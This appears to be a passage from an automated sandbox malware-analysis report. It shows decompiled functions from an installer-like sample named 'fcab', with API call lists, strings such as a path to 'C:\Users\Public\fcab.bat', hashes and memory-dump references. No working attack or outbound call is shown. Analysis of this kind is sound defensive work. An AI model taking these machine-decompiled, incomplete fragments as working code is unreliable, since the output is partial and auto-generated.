				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				WCHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x426d88 = 0x55004e;
				 *0x426d8c = 0x4c;
				if(_t44 == 0) {
					L3:
					_t12 = GetShortPathNameW( *(_t52 + 0x1c), 0x427588, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x426988, "%ls=%ls\r\n", 0x426d88, 0x427588);
						_t53 = _t52 + 0x10;
						E0040626E(_t37, 0x400, 0x427588, 0x427588,  *((intOrPtr*)( *0x42a214 + 0x128)));
						_t12 = E00405D3E(0x427588, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E00405DC1(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405CA3(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E00405CA3(_t38, _t21 + 0xa, "\n[");
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405CF9(_t24 + _t46, 0x426988, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E00405DF0(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00405D3E(_t44, 0, 1));
					_t12 = GetShortPathNameW(_t44, 0x426d88, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}



















                                                          0x00405e98
                                                          0x00405ea1
                                                          0x00405ea8
                                                          0x00405eb2
                                                          0x00405ec6
                                                          0x00405eee
                                                          0x00405ef9
                                                          0x00405efd
                                                          0x00405f1d
                                                          0x00405f24
                                                          0x00405f2e
                                                          0x00405f3b
                                                          0x00405f40
                                                          0x00405f45
                                                          0x00405f49
                                                          0x00405f58
                                                          0x00405f5a
                                                          0x00405f67
                                                          0x00405f6b
                                                          0x00406006
                                                          0x00000000
                                                          0x00405f81
                                                          0x00405f8e
                                                          0x00405fb2
                                                          0x00405fb6
                                                          0x00405fd5
                                                          0x00405fd9
                                                          0x00405fd9
                                                          0x00405fdb
                                                          0x00405fe4
                                                          0x00405fef
                                                          0x00405ffa
                                                          0x00406000
                                                          0x00000000
                                                          0x00406000
                                                          0x00405fb8
                                                          0x00405fbb
                                                          0x00405fc6
                                                          0x00405fc2
                                                          0x00405fc4
                                                          0x00405fc5
                                                          0x00405fc5
                                                          0x00405fcd
                                                          0x00405fcf
                                                          0x00000000
                                                          0x00405fcf
                                                          0x00405f99
                                                          0x00405f9f
                                                          0x00000000
                                                          0x00405f9f
                                                          0x00405f6b
                                                          0x00405f49
                                                          0x00405ec8
                                                          0x00405ed3
                                                          0x00405edc
                                                          0x00405ee0
                                                          0x00000000
                                                          0x00000000
                                                          0x00405ee0
                                                          0x00406011

                                                          APIs
                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406033,?,?), ref: 00405ED3
                                                          • GetShortPathNameW.KERNEL32 ref: 00405EDC
                                                            • Part of subcall function 00405CA3: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CB3
                                                            • Part of subcall function 00405CA3: lstrlenA.KERNEL32(00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CE5
                                                          • GetShortPathNameW.KERNEL32 ref: 00405EF9
                                                          • wsprintfA.USER32 ref: 00405F17
                                                          • GetFileSize.KERNEL32(00000000,00000000,00427588,C0000000,00000004,00427588,?,?,?,?,?), ref: 00405F52
                                                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F61
                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F99
                                                          • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,00426988,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 00405FEF
                                                          • GlobalFree.KERNEL32 ref: 00406000
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406007
                                                            • Part of subcall function 00405D3E: GetFileAttributesW.KERNELBASE(00438800,00402F01,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D42
                                                            • Part of subcall function 00405D3E: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D64
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.644793479.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.644775997.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644817233.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fcab.jbxd
                                                          Similarity
                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                          • String ID: %ls=%ls$[Rename]
                                                          • API String ID: 2171350718-461813615
                                                          • Opcode ID: e2dce14ec57fd102e1061d77b498a0ceb59b39116d7a7688ffb8e9b872a7f50f
                                                          • Instruction ID: 4a393c650f5efb56d04c3c3372b5421d1ec1fa5455b413989d263a6ec4772352
                                                          • Opcode Fuzzy Hash: e2dce14ec57fd102e1061d77b498a0ceb59b39116d7a7688ffb8e9b872a7f50f
                                                          • Instruction Fuzzy Hash: 9E316870240B19BBD220ABA59E48F6B3A5CDF41758F15003BF946F72C2DA7CD8118ABD
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 100024A4 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 98COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 89%
                                                          			E100024A4(intOrPtr* _a4) {
				intOrPtr _v4;
				intOrPtr* _t24;
				void* _t26;
				intOrPtr _t27;
				signed int _t35;
				void* _t39;
				intOrPtr _t40;
				void* _t43;

				_t39 = E1000121B();
				_t24 = _a4;
				_t40 =  *((intOrPtr*)(_t24 + 0x1014));
				_v4 = _t40;
				_t43 = (_t40 + 0x81 << 5) + _t24;
				do {
					if( *((intOrPtr*)(_t43 - 4)) != 0xffffffff) {
					}
					_t35 =  *(_t43 - 8);
					if(_t35 <= 7) {
						switch( *((intOrPtr*)(_t35 * 4 +  &M100025B4))) {
							case 0:
								 *_t39 =  *_t39 & 0x00000000;
								goto L15;
							case 1:
								_push( *__eax);
								goto L13;
							case 2:
								__eax = E10001470(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
								goto L14;
							case 3:
								__ecx =  *0x1000406c;
								__edx = __ecx - 1;
								__eax = MultiByteToWideChar(0, 0,  *__eax, __ecx, __edi, __edx);
								__eax =  *0x1000406c;
								 *(__edi + __eax * 2 - 2) =  *(__edi + __eax * 2 - 2) & 0x00000000;
								goto L15;
							case 4:
								__eax = lstrcpynW(__edi,  *__eax,  *0x1000406c);
								goto L15;
							case 5:
								_push( *0x1000406c);
								_push(__edi);
								_push( *__eax);
								" {xv@uxv"();
								goto L15;
							case 6:
								_push( *__esi);
								L13:
								__eax = wsprintfW(__edi, __ebp);
								L14:
								__esp = __esp + 0xc;
								goto L15;
						}
					}
					L15:
					_t26 =  *(_t43 + 0x14);
					if(_t26 != 0 && ( *_a4 != 2 ||  *((intOrPtr*)(_t43 - 4)) > 0)) {
						GlobalFree(_t26);
					}
					_t27 =  *((intOrPtr*)(_t43 + 0xc));
					if(_t27 != 0) {
						if(_t27 != 0xffffffff) {
							if(_t27 > 0) {
								E100012E1(_t27 - 1, _t39);
								goto L24;
							}
						} else {
							E10001272(_t39);
							L24:
						}
					}
					_v4 = _v4 - 1;
					_t43 = _t43 - 0x20;
				} while (_v4 >= 0);
				return GlobalFree(_t39);
			}











                                                          0x100024ae
                                                          0x100024b0
                                                          0x100024bf
                                                          0x100024c5
                                                          0x100024d2
                                                          0x100024d4
                                                          0x100024d8
                                                          0x100024d8
                                                          0x100024e0
                                                          0x100024e6
                                                          0x100024e8
                                                          0x00000000
                                                          0x100024ef
                                                          0x00000000
                                                          0x00000000
                                                          0x100024f5
                                                          0x00000000
                                                          0x00000000
                                                          0x100024ff
                                                          0x00000000
                                                          0x00000000
                                                          0x10002506
                                                          0x1000250c
                                                          0x10002518
                                                          0x1000251e
                                                          0x10002523
                                                          0x00000000
                                                          0x00000000
                                                          0x10002545
                                                          0x00000000
                                                          0x00000000
                                                          0x1000252b
                                                          0x10002531
                                                          0x10002532
                                                          0x10002534
                                                          0x00000000
                                                          0x00000000
                                                          0x1000254d
                                                          0x1000254f
                                                          0x10002551
                                                          0x10002553
                                                          0x10002553
                                                          0x00000000
                                                          0x00000000
                                                          0x100024e8
                                                          0x10002556
                                                          0x10002556
                                                          0x1000255b
                                                          0x1000256d
                                                          0x1000256d
                                                          0x10002573
                                                          0x10002578
                                                          0x1000257d
                                                          0x10002589
                                                          0x1000258e
                                                          0x00000000
                                                          0x10002593
                                                          0x1000257f
                                                          0x10002580
                                                          0x10002594
                                                          0x10002594
                                                          0x1000257d
                                                          0x10002595
                                                          0x10002599
                                                          0x1000259c
                                                          0x100025b3

                                                          APIs
                                                            • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                          • GlobalFree.KERNEL32 ref: 1000256D
                                                          • GlobalFree.KERNEL32 ref: 100025A8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.667355155.0000000010001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000002.00000002.667337465.0000000010000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                          • Associated: 00000002.00000002.667366350.0000000010003000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                          • Associated: 00000002.00000002.667376456.0000000010005000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_10000000_fcab.jbxd
                                                          Similarity
                                                          • API ID: Global$Free$Alloc
                                                          • String ID: {xv@uxv
                                                          • API String ID: 1780285237-1953920604
                                                          • Opcode ID: e72053471c67904cbc9fe51406c75cdd0d1e7ae72e07fb5691a107031e3f1593
                                                          • Instruction ID: 149f0ffe7112dafd64944f245e56057b96fa329c468151baa91e3d773918aa42
                                                          • Opcode Fuzzy Hash: e72053471c67904cbc9fe51406c75cdd0d1e7ae72e07fb5691a107031e3f1593
                                                          • Instruction Fuzzy Hash: 1031AF71504651EFF721CF14CCA8E2B7BB8FB853D2F114119F940961A8C7719851DB69
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004064E0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 91%
                                                          			E004064E0(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405B94(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405B4A(L"*?|<>/\":", _t5))) == 0) {
							E00405CF9(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                          0x004064e2
                                                          0x004064eb
                                                          0x00406502
                                                          0x00406502
                                                          0x00406509
                                                          0x00406515
                                                          0x00406515
                                                          0x00406518
                                                          0x0040651b
                                                          0x00406520
                                                          0x00406522
                                                          0x0040652b
                                                          0x0040652f
                                                          0x0040654c
                                                          0x00406554
                                                          0x00406554
                                                          0x00406559
                                                          0x0040655b
                                                          0x0040655e
                                                          0x00406563
                                                          0x00406564
                                                          0x00406568
                                                          0x00406568
                                                          0x00406569
                                                          0x00406570
                                                          0x00406572
                                                          0x00406579
                                                          0x00000000
                                                          0x00000000
                                                          0x00406581
                                                          0x00406587
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406587
                                                          0x0040658c

                                                          APIs
                                                          • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\Public\fcab.bat" ,00403318,C:\Users\user\AppData\Local\Temp\,74D0FAA0,00403589,?,00000006,00000008,0000000A), ref: 00406543
                                                          • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406552
                                                          • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\Public\fcab.bat" ,00403318,C:\Users\user\AppData\Local\Temp\,74D0FAA0,00403589,?,00000006,00000008,0000000A), ref: 00406557
                                                          • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\Public\fcab.bat" ,00403318,C:\Users\user\AppData\Local\Temp\,74D0FAA0,00403589,?,00000006,00000008,0000000A), ref: 0040656A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.644793479.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.644775997.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644817233.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fcab.jbxd
                                                          Similarity
                                                          • API ID: Char$Next$Prev
                                                          • String ID: "C:\Users\Public\fcab.bat" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 589700163-783386484
                                                          • Opcode ID: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
                                                          • Instruction ID: 6610343985016d4d3861ed5752e28572e14021042ee5aa5e44fa789d85a72fac
                                                          • Opcode Fuzzy Hash: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
                                                          • Instruction Fuzzy Hash: 0811B255800612A5DB303B14AD40AB7A2B8EF58794F52403FED9AB32C5E77C9C9286BD
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00404248 Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00404248(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}








                                                          0x0040425a
                                                          0x004042ee
                                                          0x00000000
                                                          0x004042ee
                                                          0x0040426b
                                                          0x0040426f
                                                          0x00000000
                                                          0x00000000
                                                          0x00404275
                                                          0x0040427e
                                                          0x00404281
                                                          0x00404281
                                                          0x00404287
                                                          0x0040428d
                                                          0x0040428d
                                                          0x00404299
                                                          0x0040429f
                                                          0x004042a6
                                                          0x004042a9
                                                          0x004042ac
                                                          0x004042ae
                                                          0x004042ae
                                                          0x004042b6
                                                          0x004042bc
                                                          0x004042bc
                                                          0x004042c6
                                                          0x004042cb
                                                          0x004042ce
                                                          0x004042d3
                                                          0x004042d6
                                                          0x004042d6
                                                          0x004042e6
                                                          0x004042e6
                                                          0x00000000

                                                          APIs
                                                          • GetWindowLongW.USER32(?,000000EB), ref: 00404265
                                                          • GetSysColor.USER32(00000000), ref: 00404281
                                                          • SetTextColor.GDI32(?,00000000), ref: 0040428D
                                                          • SetBkMode.GDI32(?,?), ref: 00404299
                                                          • GetSysColor.USER32(?), ref: 004042AC
                                                          • SetBkColor.GDI32(?,?), ref: 004042BC
                                                          • DeleteObject.GDI32(?), ref: 004042D6
                                                          • CreateBrushIndirect.GDI32(?), ref: 004042E0
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.644793479.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.644775997.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644817233.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fcab.jbxd
                                                          Similarity
                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                          • String ID:
                                                          • API String ID: 2320649405-0
                                                          • Opcode ID: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                                          • Instruction ID: 35b1f235034bf6ed7bc4b251198a1cd7c2be2f7e10ce7e0bcb7d9fbd5291f4f5
                                                          • Opcode Fuzzy Hash: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                                          • Instruction Fuzzy Hash: D7218471600704AFCB219F68DE08B4BBBF8AF41750B04897EFD95E26A0D734D904CB64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 100022D0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135memoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 85%
                                                          			E100022D0(void* __edx) {
				void* _t37;
				signed int _t38;
				void* _t39;
				void* _t41;
				signed int* _t42;
				signed int* _t51;
				void* _t52;
				void* _t54;

				 *(_t54 + 0x10) = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8)) + 0x1014)) > 0x00000000;
				while(1) {
					_t9 =  *((intOrPtr*)(_t54 + 0x18)) + 0x1018; // 0x1018
					_t51 = ( *(_t54 + 0x10) << 5) + _t9;
					_t52 = _t51[6];
					if(_t52 == 0) {
						goto L9;
					}
					_t41 = 0x1a;
					if(_t52 == _t41) {
						goto L9;
					}
					if(_t52 != 0xffffffff) {
						if(_t52 <= 0 || _t52 > 0x19) {
							_t51[6] = _t41;
							goto L12;
						} else {
							_t37 = E100012BA(_t52 - 1);
							L10:
							goto L11;
						}
					} else {
						_t37 = E10001243();
						L11:
						_t52 = _t37;
						L12:
						_t13 =  &(_t51[2]); // 0x1020
						_t42 = _t13;
						if(_t51[1] != 0xffffffff) {
						}
						_t38 =  *_t51;
						_t51[7] = 0;
						if(_t38 > 7) {
							L27:
							_t39 = GlobalFree(_t52);
							if( *(_t54 + 0x10) == 0) {
								return _t39;
							}
							if( *(_t54 + 0x10) !=  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x18)) + 0x1014))) {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) + 1;
							} else {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) & 0x00000000;
							}
							continue;
						} else {
							switch( *((intOrPtr*)(_t38 * 4 +  &M10002447))) {
								case 0:
									 *_t42 = 0;
									goto L27;
								case 1:
									__eax = E10001311(__ebp);
									goto L21;
								case 2:
									 *__edi = E10001311(__ebp);
									__edi[1] = __edx;
									goto L27;
								case 3:
									__eax = GlobalAlloc(0x40,  *0x1000406c);
									 *(__esi + 0x1c) = __eax;
									__edx = 0;
									 *__edi = __eax;
									__eax = WideCharToMultiByte(0, 0, __ebp,  *0x1000406c, __eax,  *0x1000406c, 0, 0);
									goto L27;
								case 4:
									__eax = E1000122C(__ebp);
									 *(__esi + 0x1c) = __eax;
									L21:
									 *__edi = __eax;
									goto L27;
								case 5:
									__eax = GlobalAlloc(0x40, 0x10);
									_push(__eax);
									 *(__esi + 0x1c) = __eax;
									_push(__ebp);
									 *__edi = __eax;
									__imp__CLSIDFromString();
									goto L27;
								case 6:
									if( *__ebp != __cx) {
										__eax = E10001311(__ebp);
										 *__ebx = __eax;
									}
									goto L27;
								case 7:
									 *(__esi + 0x18) =  *(__esi + 0x18) - 1;
									( *(__esi + 0x18) - 1) *  *0x1000406c =  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2 + 0x18;
									 *__ebx =  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2 + 0x18;
									asm("cdq");
									__eax = E10001470(__edx,  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2 + 0x18, __edx,  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2);
									goto L27;
							}
						}
					}
					L9:
					_t37 = E1000122C(0x10004044);
					goto L10;
				}
			}











                                                          0x100022e4
                                                          0x100022e8
                                                          0x100022f3
                                                          0x100022f3
                                                          0x100022fa
                                                          0x100022ff
                                                          0x00000000
                                                          0x00000000
                                                          0x10002303
                                                          0x10002306
                                                          0x00000000
                                                          0x00000000
                                                          0x1000230b
                                                          0x10002316
                                                          0x10002326
                                                          0x00000000
                                                          0x1000231d
                                                          0x1000231f
                                                          0x10002335
                                                          0x00000000
                                                          0x10002335
                                                          0x1000230d
                                                          0x1000230d
                                                          0x10002336
                                                          0x10002336
                                                          0x10002338
                                                          0x1000233c
                                                          0x1000233c
                                                          0x1000233f
                                                          0x1000233f
                                                          0x10002347
                                                          0x1000234e
                                                          0x10002351
                                                          0x10002410
                                                          0x10002411
                                                          0x1000241c
                                                          0x10002446
                                                          0x10002446
                                                          0x1000242c
                                                          0x10002438
                                                          0x1000242e
                                                          0x1000242e
                                                          0x1000242e
                                                          0x00000000
                                                          0x10002357
                                                          0x10002357
                                                          0x00000000
                                                          0x1000235e
                                                          0x00000000
                                                          0x00000000
                                                          0x10002366
                                                          0x00000000
                                                          0x00000000
                                                          0x10002374
                                                          0x10002376
                                                          0x00000000
                                                          0x00000000
                                                          0x10002397
                                                          0x1000239d
                                                          0x100023a0
                                                          0x100023a2
                                                          0x100023b2
                                                          0x00000000
                                                          0x00000000
                                                          0x1000237f
                                                          0x10002384
                                                          0x10002387
                                                          0x10002388
                                                          0x00000000
                                                          0x00000000
                                                          0x100023be
                                                          0x100023c4
                                                          0x100023c5
                                                          0x100023c8
                                                          0x100023c9
                                                          0x100023cb
                                                          0x00000000
                                                          0x00000000
                                                          0x100023d7
                                                          0x100023da
                                                          0x100023e6
                                                          0x100023e8
                                                          0x00000000
                                                          0x00000000
                                                          0x100023f4
                                                          0x10002400
                                                          0x10002403
                                                          0x10002405
                                                          0x10002408
                                                          0x00000000
                                                          0x00000000
                                                          0x10002357
                                                          0x10002351
                                                          0x1000232b
                                                          0x10002330
                                                          0x00000000
                                                          0x10002330

                                                          APIs
                                                          • GlobalFree.KERNEL32 ref: 10002411
                                                            • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                                          • GlobalAlloc.KERNEL32(00000040), ref: 10002397
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.667355155.0000000010001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000002.00000002.667337465.0000000010000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                          • Associated: 00000002.00000002.667366350.0000000010003000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                          • Associated: 00000002.00000002.667376456.0000000010005000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_10000000_fcab.jbxd
                                                          Similarity
                                                          • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                          • String ID: @uxv
                                                          • API String ID: 4216380887-3068791405
                                                          • Opcode ID: 40c1fda0fc222d3deaf0be0606799ffba2a33d40f74f168943dcfaeb9bc9158e
